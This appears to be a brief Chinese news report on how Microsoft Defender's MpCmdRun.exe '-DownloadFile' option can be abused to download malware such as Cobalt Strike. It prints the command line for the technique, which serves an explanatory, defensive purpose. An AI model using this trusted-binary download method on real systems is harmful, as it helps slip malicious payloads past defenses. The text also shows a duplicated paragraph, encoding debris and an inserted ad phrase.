微軟此前在 Microsoft Defender 中增加了通過(guò)命令行下載文件的功能。測(cè)試人員 Mohammad Askar 表示,Microsoft Defender 命令行工具的更改可能使攻擊者利用其下載惡意程序。
微軟此前在 Microsoft Defender 中增加了通過(guò)命令行下載文件的功能。測(cè)試人員 Mohammad Askar 表示,Microsoft Defender 命令行工具的更改可能使攻擊者利用其下載惡意程序。
盡管有這些報(bào)道,Microsoft Defender 防病毒軟件與 Microsoft Defender ATP 仍將保護(hù)客戶免受惡意軟件的侵害。這些程序會(huì)檢測(cè)通過(guò)防病毒文件下載功能下載到系統(tǒng)的惡意文件。
石家莊網(wǎng)站建設(shè)了解到,Askar 此前表示,Microsoft Defender 命令行工具支持新的 “ -DownloadFile”功能。攻擊者可以使用 Microsoft 反惡意軟件服務(wù)命令行實(shí)用程序通過(guò)以下命令從 Internet 下載文件:“ MpCmdRun.exe -DownloadFile -url <url> -path >local-path>” 。
通過(guò)這一途徑,Askar 能夠直接通過(guò) Microsoft Defender 從遠(yuǎn)程位置下載 Cobalt Strike 惡意軟件。